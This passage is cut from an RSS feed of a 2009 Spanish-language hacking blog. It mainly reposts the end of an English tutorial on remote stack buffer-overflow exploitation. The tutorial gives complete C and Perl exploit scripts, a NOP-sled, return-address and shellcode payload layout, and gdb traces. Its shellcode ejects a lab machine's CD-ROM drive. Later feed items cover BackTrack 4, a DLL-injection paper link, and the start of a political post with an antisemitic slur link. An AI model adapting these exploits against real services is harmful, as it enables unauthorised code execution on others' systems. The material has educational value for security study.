/&gt;memset(payload,NOP,228); //construct the nopsled&lt;br /&gt;memcpy(payload+228,scode,sizeof(scode)); //place our shellcode after the nopsled&lt;br /&gt;memcpy(payload+268,eip,sizeof(eip)); //place eip after our shellcode&lt;br /&gt;&lt;br /&gt;/*&lt;br /&gt;&lt;br /&gt;structure:&lt;br /&gt;&lt;br /&gt;[NOPSLED - 228 BYTES] + [SHELLCODE - 40 BYTES] + [EIP - 4 BYTES] = 272 BYTES&lt;br /&gt;&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;/* connection information */&lt;br /&gt;remaddr.sin_family = AF_INET; //domain&lt;br /&gt;remaddr.sin_addr.s_addr = inet_addr(argv[1]); //remote connection address (our first argument - IP)&lt;br /&gt;remaddr.sin_port = htons(REMPORT); //the remote port to connect to (previously defined as 7500)&lt;br /&gt;&lt;br /&gt;/* this is where the actual connection take's place */&lt;br /&gt;&lt;br /&gt;conn = connect(fd, (struct sockaddr_in *)&amp;remaddr,sizeof(remaddr)); &lt;br /&gt;&lt;br /&gt;/* check the connection for errors as you know it returns -1 at errors */&lt;br /&gt;if(conn &lt; 0)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;printf("Error: could not connect\n");&lt;br /&gt;exit(1);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;/* this is the part where our payload gets sent */&lt;br /&gt;&lt;br /&gt;send(fd,payload,strlen(payload),0);&lt;br /&gt;&lt;br /&gt;/* this is extra information which is displayed after sending the payload */&lt;br /&gt;&lt;br /&gt;printf("Payload Size: %i\n",sizeof(payload));&lt;br /&gt;printf("Payload Sent..\n");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Let's start compiling our exploit,&lt;br /&gt;&lt;br /&gt;client:&lt;br /&gt;---&lt;br /&gt;gcc server_exploit.c -o server_exploit&lt;br /&gt;&lt;br /&gt;./server_exploit 192.168.1.101&lt;br /&gt;Payload Size: 272&lt;br /&gt;Payload Sent..&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;server:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;bash-3.00# ./server&lt;br /&gt;got connection from 192.168.1.100&lt;br /&gt;The client says "jX1?Qhdromhev/ch///d??ð6f?   S? @?BBBB"&lt;br /&gt;^[[?1;2cSegmentation fault (core dumped)&lt;br /&gt;bash-3.00# gdb -c core ./server&lt;br /&gt;GNU gdb 6.3&lt;br /&gt;Copyright 2004 Free Software Foundation, Inc.&lt;br /&gt;GDB is free software, covered by the GNU General Public License, and you are&lt;br /&gt;welcome to change it and/or distribute copies of it under certain conditions.&lt;br /&gt;Type "show copying" to see the conditions.&lt;br /&gt;There is absolutely no warranty for GDB.  Type "show warranty" for details.&lt;br /&gt;This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".&lt;br /&gt;&lt;br /&gt;Core was generated by `./server'.&lt;br /&gt;Program terminated with signal 11, Segmentation fault.&lt;br /&gt;&lt;br /&gt;warning: current_sos: Can't read pathname for load map: Input/output error&lt;br /&gt;&lt;br /&gt;Reading symbols from /lib/tls/libc.so.6...done.&lt;br /&gt;Loaded symbols for /lib/tls/libc.so.6&lt;br /&gt;Reading symbols from /lib/ld-linux.so.2...done.&lt;br /&gt;Loaded symbols for /lib/ld-linux.so.2&lt;br /&gt;#0  0x42424242 in ?? ()&lt;br /&gt;(gdb)&lt;br /&gt;(gdb) i r eip&lt;br /&gt;eip            0x42424242       0x42424242&lt;br /&gt;(gdb) x/1000xb $esp&lt;br /&gt;0xbffff2b0:     0x02    0x00    0xff    0xbf    0xc0    0xf2    0xff    0xbf&lt;br /&gt;0xbffff2b8:     0x00    0x04    0x00    0x00    0x00    0x00    0x00    0x00&lt;br /&gt;0xbffff2c0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2c8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2d0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2d8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2e0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2e8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2f0:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff2f8:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff300:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff308:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff310:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff318:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff320:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff328:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff330:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff338:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff340:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff348:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff350:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff358:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff360:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff368:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff370:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff378:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff380:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;0xbffff388:     0x90    0x90    0x90    0x90    0x90    0x90    0x90    0x90&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;As you can see we have overwritten the extended instruction pointer once again&lt;br /&gt;and you can see our nopsled above in memory&lt;br /&gt;&lt;br /&gt;Let's pick a random address from the nopsled,&lt;br /&gt;&lt;br /&gt;0xbffff2f8&lt;br /&gt;&lt;br /&gt;write it in little-endian format (more info: http://www.answers.com/topic/endianness)&lt;br /&gt;&lt;br /&gt;EIP:&lt;br /&gt;&lt;br /&gt;\xf8\xf2\xff\xbf&lt;br /&gt;&lt;br /&gt;and let's replace the old EIP with the new one in our "server_exploit.c" program&lt;br /&gt;&lt;br /&gt;so:&lt;br /&gt;&lt;br /&gt;char *eip = "\x42\x42\x42\x42";&lt;br /&gt;&lt;br /&gt;becomes&lt;br /&gt;&lt;br /&gt;char *eip = "\xf8\xf2\xff\xbf";&lt;br /&gt;&lt;br /&gt;and let's recompile the program,&lt;br /&gt;&lt;br /&gt;gcc server_exploit.c -o server_exploit&lt;br /&gt;&lt;br /&gt;client:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;./server_exploit 192.168.1.101&lt;br /&gt;Payload Size: 272&lt;br /&gt;Payload Sent..&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;server:&lt;br /&gt;---&lt;br /&gt;bash-3.00# ./server&lt;br /&gt;got connection from 192.168.1.100&lt;br /&gt;The client says "jX1?Qhdromhev/ch///d??ð6f?   S? @?????"&lt;br /&gt;^[[?1;2cbash-3.00# 1;2c&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;and yes, my cd-rom drive ejected....&lt;br /&gt;&lt;br /&gt;as you can see we have managed to successfully exploit a remote&lt;br /&gt;buffer overflow by using c code. Some people have allot of problems with&lt;br /&gt;c , they find it hard or they are to lazy to learn it :PpPppP&lt;br /&gt;&lt;br /&gt;Perl is allot easier to learn in my opinion and would be confortable for &lt;br /&gt;some people.The next section will use Perl to exploit this vulnerability&lt;br /&gt;and open the cd-rom drive of the computer.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[1.5]--[ Payload/Code construction/analyses in Perl&lt;br /&gt;&lt;br /&gt;Let's start again by sending a 272 byte buffer to the server in Perl,&lt;br /&gt;&lt;br /&gt;send_overflow.pl&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;####################################################################&lt;br /&gt;#&lt;br /&gt;#-- Send overflow (Perl version) written by Preddy&lt;br /&gt;#&lt;br /&gt;#   Part of Preddy's Remote Exploitation with C and Perl tutorial&lt;br /&gt;#&lt;br /&gt;#   Usage: perl send_overflow.pl &lt;ip&gt;&lt;br /&gt;#&lt;br /&gt;#   Example: perl send_overflow.pl 192.168.1.101&lt;br /&gt;#&lt;br /&gt;####################################################################&lt;br /&gt;&lt;br /&gt;#IO::Socket for network connections&lt;br /&gt;use IO::Socket;&lt;br /&gt;&lt;br /&gt;#the ip address is our first commandline argument also known as ARGV[0] in Perl&lt;br /&gt;$ip = $ARGV[0];&lt;br /&gt;&lt;br /&gt;#our payload which is 272 bytes of A (0x41,x41)&lt;br /&gt;$payload = "\x41"x272;&lt;br /&gt;&lt;br /&gt;#view a message if no ip address is given&lt;br /&gt;if(!$ip)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;die "Specify ip plz..\n";&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#the remote port to connect to&lt;br /&gt;$port = '7500';&lt;br /&gt;&lt;br /&gt;#the connection protocol to use&lt;br /&gt;$protocol = 'tcp';&lt;br /&gt;&lt;br /&gt;#create the actual network connection&lt;br /&gt;#and print an error message if it's not possible to create a socket&lt;br /&gt;$socket = IO::Socket::INET-&gt;new(PeerAddr=&gt;$ip,&lt;br /&gt;                                PeerPort=&gt;$port,&lt;br /&gt;                                Proto=&gt;$protocol,&lt;br /&gt;                                Timeout=&gt;'1') || die "Could not create socket\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#send the payload to the remote computer&lt;br /&gt;print $socket $payload;&lt;br /&gt;&lt;br /&gt;#close the connection&lt;br /&gt;close($socket);&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;Let's start by running the script without any arguments,&lt;br /&gt;&lt;br /&gt;perl send_overflow.pl&lt;br /&gt;Specify ip plz..&lt;br /&gt;&lt;br /&gt;And let's send the payload (272 x A - 0x41)&lt;br /&gt;&lt;br /&gt;client:&lt;br /&gt;---&lt;br /&gt;perl send_overflow.pl 192.168.1.101&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;server:&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;bash-3.00# ./server&lt;br /&gt;got connection from 192.168.1.100&lt;br /&gt;The client says "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB"&lt;br /&gt;Segmentation fault (core dumped)&lt;br /&gt;bash-3.00# gdb -c core ./server&lt;br /&gt;GNU gdb 6.3&lt;br /&gt;Copyright 2004 Free Software Foundation, Inc.&lt;br /&gt;GDB is free software, covered by the GNU General Public License, and you are&lt;br /&gt;welcome to change it and/or distribute copies of it under certain conditions.&lt;br /&gt;Type "show copying" to see the conditions.&lt;br /&gt;There is absolutely no warranty for GDB.  Type "show warranty" for details.&lt;br /&gt;This GDB was configured as "i486-slackware-linux"...Using host libthread_db library "/lib/tls/libthread_db.so.1".&lt;br /&gt;&lt;br /&gt;Core was generated by `./server'.&lt;br /&gt;Program terminated with signal 11, Segmentation fault.&lt;br /&gt;&lt;br /&gt;warning: current_sos: Can't read pathname for load map: Input/output error&lt;br /&gt;&lt;br /&gt;Reading symbols from /lib/tls/libc.so.6...done.&lt;br /&gt;Loaded symbols for /lib/tls/libc.so.6&lt;br /&gt;Reading symbols from /lib/ld-linux.so.2...done.&lt;br /&gt;Loaded symbols for /lib/ld-linux.so.2&lt;br /&gt;#0  0x41414141 in ?? ()&lt;br /&gt;(gdb)&lt;br /&gt;(gdb) i r eip&lt;br /&gt;eip            0x41414141       0x41414141&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;as you can see we have overwritten eip ,&lt;br /&gt;&lt;br /&gt;now let's construct our payload&lt;br /&gt;&lt;br /&gt;[NOPSLED - 228 bytes] + [SHELLCODE - 40 bytes] + [EIP - 4 bytes] = 272 bytes&lt;br /&gt;&lt;br /&gt;we can just use the same payload from the C section&lt;br /&gt;in it's perl form.&lt;br /&gt;&lt;br /&gt;server_exploit.pl&lt;br /&gt;---&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;####################################################################&lt;br /&gt;#&lt;br /&gt;#-- Server Exploit (Perl version) written by Preddy&lt;br /&gt;#&lt;br /&gt;#   Part of Preddy's Remote Exploitation with C and Perl tutorial&lt;br /&gt;#&lt;br /&gt;#   Usage: perl server_exploit.pl &lt;ip&gt;&lt;br /&gt;#&lt;br /&gt;#   Example: perl server_exploit.pl 192.168.1.101&lt;br /&gt;#&lt;br /&gt;####################################################################&lt;br /&gt;&lt;br /&gt;#IO::Socket for network connections&lt;br /&gt;use IO::Socket;&lt;br /&gt;&lt;br /&gt;#the ip address is our first commandline argument also known as ARGV[0] in Perl&lt;br /&gt;$ip = $ARGV[0];&lt;br /&gt;&lt;br /&gt;#our nopsled&lt;br /&gt;$nopsled = "\x90"x228;&lt;br /&gt;&lt;br /&gt;#our shellcode which opens the remote cd-rom drive  - 40 bytes (thanks to izik)&lt;br /&gt;$shellcode =  "\x6a\x05".              # push $0x5 &lt;br /&gt;         "\x58".                  # pop %eax &lt;br /&gt;         "\x31\xc9".              # xor %ecx,%ecx &lt;br /&gt;         "\x51".                  # push %ecx &lt;br /&gt;         "\xb5\x08".              # mov $0x8,%ch &lt;br /&gt;         "\x68\x64\x72\x6f\x6d".  # push $0x6d6f7264 &lt;br /&gt;         "\x68\x65\x76\x2f\x63".  # push $0x632f7665 &lt;br /&gt;         "\x68\x2f\x2f\x2f\x64".  # push $0x642f2f2f &lt;br /&gt;         "\x89\xe3".              # mov %esp,%ebx &lt;br /&gt;         "\xcd\x80".              # int $0x80 &lt;br /&gt;         "\x89\xc3".              # mov %eax,%ebx &lt;br /&gt;         "\xb0\x36".              # mov $0x36,%al &lt;br /&gt;         "\x66\xb9\x09\x53".      # mov $0x5309,%cx&lt;br /&gt;         "\xcd\x80".              # int $0x80 &lt;br /&gt;         "\x40".                  # inc %eax &lt;br /&gt;         "\xcd\x80";              # int $0x80 &lt;br /&gt;&lt;br /&gt;#our extended instruction pointer which we use to overwrite the remote eip&lt;br /&gt;$eip = "\xf8\xf2\xff\xbf";&lt;br /&gt;&lt;br /&gt;#we construct our full payload here&lt;br /&gt;$payload = $nopsled.$shellcode.$eip;&lt;br /&gt;&lt;br /&gt;#view a message if no ip address is given&lt;br /&gt;if(!$ip)&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;die "Specify ip plz..\n";&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;#the remote port to connect to&lt;br /&gt;$port = '7500';&lt;br /&gt;&lt;br /&gt;#the connection protocol to use&lt;br /&gt;$protocol = 'tcp';&lt;br /&gt;&lt;br /&gt;#create the actual network connection&lt;br /&gt;#and print an error message if it's not possible to create a socket&lt;br /&gt;$socket = IO::Socket::INET-&gt;new(PeerAddr=&gt;$ip,&lt;br /&gt;                                PeerPort=&gt;$port,&lt;br /&gt;                                Proto=&gt;$protocol,&lt;br /&gt;                                Timeout=&gt;'1') || die "Could not create socket\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#send the payload to the remote computer&lt;br /&gt;print $socket $payload;&lt;br /&gt;&lt;br /&gt;#close the connection&lt;br /&gt;close($socket);&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;Let's run the perl script again:&lt;br /&gt;&lt;br /&gt;perl server_exploit.pl 192.168.1.101&lt;br /&gt;&lt;br /&gt;and yes! my cd-rom drive opened again :) what a miracle.. :PpPppP&lt;br /&gt;(kids: don't irritate your father's box by continuesly opening his cd-rom drive)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[1.6]--[ Conclusion&lt;br /&gt;&lt;br /&gt;Well we have learned to construct payloads and write exploits which&lt;br /&gt;use those payloads. A good thing to do is to learn more about different&lt;br /&gt;types of overflows and their exploitation methods, also practicing&lt;br /&gt;different types of programming languages could be usefull.&lt;br /&gt;&lt;br /&gt;[1.7]--[ Contact &amp; Feedback&lt;br /&gt;&lt;br /&gt;You can contact me by,&lt;br /&gt;&lt;br /&gt;IRC: &lt;br /&gt;&lt;br /&gt;FREENODE: ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor&lt;br /&gt;MILW0RM: #milw0rm&lt;br /&gt;GSO: #gso-chat&lt;br /&gt;STS: #lecture,#social&lt;br /&gt;&lt;br /&gt;IM , msn : preddy @hushmail.com&lt;br /&gt;&lt;br /&gt;EMAIL, : m4ilinglists @gmail.com&lt;br /&gt;&lt;br /&gt;please notify me of any mistake's which I might have made :)&lt;br /&gt;or any other comments..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Cya around guyz,&lt;br /&gt;&lt;br /&gt;Preddy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lol &lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-6125399508130148493?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/0e072uB2F4o" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-03-19T21:21:18.286-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/03/remote-exploitation-with-c-and-perl-by.html</feedburner:origLink></item><item><title>Lanzada Beta De Backtrack4 Basada En Ubuntu :D</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/GjCn7AfBMf0/lanzada-beta-de-backtrack4-basada-en.html</link><category>Herramientas</category><category>pentest</category><category>linux</category><category>livecd</category><category>Hacking</category><category>Noticias</category><category>Backtrack</category><category>wireless hacking</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Tue, 24 Feb 2009 15:53:04 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-2080886050286408334</guid><description>Aunque no es una gran noticia ni tampoco nueva ya fue lanzada la version nueva de &lt;a href="http://www.remote-exploit.org/backtrack_download.html"&gt;Backtrack4&lt;/a&gt; en su edicion beta...&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_LztS6-97iyY/SYdTx6iI4EI/AAAAAAAADzs/tQJaNj_9gyg/s1600-h/06.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_LztS6-97iyY/SYdTx6iI4EI/AAAAAAAADzs/tQJaNj_9gyg/s320/06.png" alt="" id="BLOGGER_PHOTO_ID_5298295603615817794" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;yo ya la descargue personalmente y el cambio de la base distro de &lt;a href="http://www.slackware.com/"&gt;Slackware&lt;/a&gt; (&lt;a href="http://www.slax.org/"&gt;slax&lt;/a&gt;) a &lt;a href="http://www.debian.org/index.es.html"&gt;Debian&lt;/a&gt;&lt;br /&gt;(&lt;a href="http://www.ubuntu-es.org/"&gt;ubuntu&lt;/a&gt;) no es muy favorecido de mi parte...&lt;br /&gt;&lt;br /&gt;por lo que puedo analizar que los desarrolladores de backtrack solo querian implementar mas al usuario "newbie" o usuario normal y la compatibilidad de hardware que carecia la revision pasada con su nuevo kernel...&lt;br /&gt;&lt;br /&gt; cuenta con repositorios de la comunidad "Ubuntu" y su gestor de paquetes synaptic aunque para los que no le gustan el gestor todavia existe "apt" en fin la orientacion es que los desarrolladores tienen miras a competir con las distribuciones mas populares...&lt;br /&gt;&lt;br /&gt;en este caso sigue siendo una distribucion de linux live orientada a la auditoria de sistemas/wireless/lan/servidores/passwords/forense para mi una buena distribucion si no la mejor para estos fines de auditorias de seguridad...&lt;br /&gt;&lt;br /&gt;muchos profesionales IT opinan que es la mejor suite de herramientas para estos fines y yo no difiero con ellos...&lt;br /&gt;&lt;br /&gt;desde la practica del "&lt;a href="http://en.wikipedia.org/wiki/White_hat"&gt;Ethical Hacking&lt;/a&gt;" (Hacking Etico) hasta practicas &lt;a href="http://en.wikipedia.org/wiki/Script_kiddie"&gt;Script Kiddies. &lt;/a&gt;&lt;br /&gt;o rituales de &lt;a href="http://es.wikipedia.org/wiki/Lamer_%28inform%C3%A1tica%29"&gt;Lammers&lt;/a&gt; en fin pueden usarlo todo tipo de personas no significa que usarla te convierte en alguno de esos terminos en esta revision buscaron hacerla un poco mas amigable para el usuario normal..&lt;br /&gt;&lt;br /&gt;aunque cabe recalcar que sigue siendo una suite y conjunto de herramientas orientadas al IT o auditorias..&lt;br /&gt;&lt;br /&gt;esta revision cuenta con algunos cambios como:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Soporte para tarjetas pico e10 y e12 (para UMPCs)&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Posibilidad de arrancar  por red mediante PXE   &lt;/li&gt;&lt;li&gt;Versión limitada de la herramienta &lt;a href="http://www.saintcorporation.com/products/penetration_testing/saint_exploit.html"&gt;SAINT Exploit&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Versión libre de &lt;a href="http://www.securitybydefault.com/2008/12/la-bsqueda-de-informacin-en-un-test-de.html"&gt;Maltego&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Actualizaciones en los drivers de tarjetas wireless, necesarios para auditorías&lt;/li&gt;&lt;li&gt;Soporte RFID&lt;/li&gt;&lt;li&gt;Nuevas herramientas de seguridad.&lt;/li&gt;&lt;/ul&gt;Aunque no son muchas los cambios no son muy notables referentes a la organizacion del menu sigue siendo kde 3.5 y no la ultima version 4.0 (los rumores son que para la version final lo sera) se le agregaron solo algunas herramientas...&lt;br /&gt;&lt;br /&gt;en fin igual los desarrolladores De &lt;a href="http://www.remote-exploit.org/"&gt;Remote Exploit&lt;/a&gt; hicieron nuevamente un gran trabajo con la mejor live cd de seguridad que existe (Hacking)...&lt;br /&gt;&lt;br /&gt;y esperamos que cuando se realize el lanzamiento de la version final se aun mas prometedora,vuelvo y recalco que no favorezco mucho su cambio de slax a ubuntu pero en fin los desarrolladores de dicha live cd hacen su trabajo de manera excelente...&lt;br /&gt;&lt;br /&gt;para obtener Backtrack 4 la pueden obtener desde su sitio web :&lt;br /&gt;Version Dvd &lt;a href="http://lix.in/-38fc6f"&gt;Aqui&lt;/a&gt;.&lt;br /&gt;Version Para Vmware &lt;a href="http://lix.in/-3c09b1"&gt;Aqui&lt;/a&gt;.&lt;br /&gt;Imagen Para Adherir Al &lt;a href="http://lix.in/-409d94"&gt;Cd Label&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Traeremos actualizaciones siguientes al lanzamiento de la version final&lt;br /&gt;&lt;br /&gt;Pd: La lista de herramientas de Backtrack4 la pueden conseguir aqui &lt;a href="http://backtrack.offensive-security.com/index.php/Tools"&gt;LINK&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;salu2&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-2080886050286408334?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/GjCn7AfBMf0" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-02-24T15:53:04.462-08:00</app:edited><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_LztS6-97iyY/SYdTx6iI4EI/AAAAAAAADzs/tQJaNj_9gyg/s72-c/06.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/02/lanzada-beta-de-backtrack4-basada-en.html</feedburner:origLink></item><item><title>Conectividad [Problema Resuelto]</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/fHQBKnPmI_U/conectividad-problema-resuelto.html</link><category>Noticias</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Tue, 24 Feb 2009 13:30:49 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-4607482224303311071</guid><description>Ya llegue al infierno aqui las temperaturas varian notablemente de 40 grados suben a la hora pico a los 100 grados :D...&lt;br /&gt;&lt;br /&gt;en fin ni que hablar de la conexion de internet aparte de que tienen censurados la mayoria de los sitios que conozco si posees tu tarjeta de internet debes hacer miles de cosas para conectarte...&lt;br /&gt;&lt;br /&gt;malditos en fin ya puedo conectarme y a poner al dia mi maldito blog ya que por si es mi unica herramienta que poseo para entretenerme o expresar lo que estoy pasando con esta nueva etapa en mi vida...&lt;br /&gt;&lt;div align="center"&gt;1st Squad,3rd Platoon,Echo Company 2-54 U.S.M.C&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-4607482224303311071?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/fHQBKnPmI_U" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-02-24T13:30:49.322-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/02/conectividad-problema-resuelto.html</feedburner:origLink></item><item><title>Inyeccion DLL En Windows Vista</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/YekKmfW8kUc/inyeccion-dll-en-windows-vista.html</link><category>dll injection</category><category>windows</category><category>Vulnerabilidades</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Tue, 27 Jan 2009 16:07:57 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-3477360388878769055</guid><description>An insight on how to inject a dynamic library (DLL) into a 32 bit process in Windows Vista with the use of Remote Threads&lt;br /&gt;and taking into consideration the Address Space Layout Randomization (ASLR). The sample code used is written in&lt;br /&gt;assembly language (MASM32) using the WinAsm IDE. It should give you a better understanding on how dynamic libraries&lt;br /&gt;can be injected.&lt;br /&gt;&lt;br /&gt;Un Analisis Mas A Fondo De Como Injectar Una Libreria Dinamica (Dll) En Windows Vista.&lt;br /&gt;&lt;br /&gt;Es Un Archivo Pdf En Ingles Y muy Explicado :D&lt;br /&gt;&lt;br /&gt;&lt;div class="downloadlink"&gt;&lt;a href="http://rapidshare.com/files/190409926/275.pdf.html"&gt;http://rapidshare.com/files/190409926/275.pdf.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8993704577829861185-3477360388878769055?l=h4xxor.blogspot.com'/&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/H4xxorSecurityBlog/~4/YekKmfW8kUc" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2009-01-27T16:07:57.202-08:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total><feedburner:origLink>http://h4xxor.blogspot.com/2009/01/inyeccion-dll-en-windows-vista.html</feedburner:origLink></item><item><title>Seguira El Abuso De Israel (ZIONISTAS) [imagenes Graficas]</title><link>http://feedproxy.google.com/~r/H4xxorSecurityBlog/~3/WJ8rlC827vk/seguira-el-abuso-de-israel-zionistas.html</link><category>Noticias</category><category>Mi Vida</category><author>noreply@blogger.com (r3b1rth X)</author><pubDate>Mon, 12 Jan 2009 18:54:52 PST</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-8993704577829861185.post-708461255875086983</guid><description>[Contenido Grafico De Imagenes Discrecion]&lt;br /&gt;&lt;br /&gt;Bueno a raiz de un usuario en el foro de &lt;a href="http://e-r00t.s0me.co.cc/foro/index.php"&gt;e-r00t &lt;/a&gt;que hizo comentarios hacia mi persona afirmando que yo tenia vinculos con terroristas o que una celula terrorista me ayudaba financieramente para yo practicar ataques informaticos..pos levanto algo que si es real despues de dichos comentarios falsos...&lt;br /&gt;&lt;br /&gt;si condeno los  ataques Israelitas hacia los palestinos en Gaza y El Libano....&lt;a href="http://www.serendipity.li/zionism/bush_flag_small.jpg"&gt;Los Judios&lt;/a&gt; siguen con su 